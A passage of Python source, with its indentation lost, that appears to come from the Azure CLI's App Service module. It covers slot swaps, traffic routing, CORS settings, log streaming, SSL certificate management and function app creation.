setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
# Default isPreserveVnet to 'True' if preserve_vnet is 'None'
isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
# converstion from string to Boolean
isPreserveVnet = bool(isPreserveVnet == 'true')
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), isPreserveVnet)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, isPreserveVnet)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, isPreserveVnet)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
# If in the public cloud, check if certificate is an app service certificate, in the same or a diferent
# subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != client.config.subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
# if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except DefaultErrorResponseException as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
# delimiters allowed: '|', ':'
if '|' in runtime:
runtime = re.split('[|]', runtime)
elif ':' in runtime:
runtime = re.split('[:]', runtime)
else:
runtime = [runtime]
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
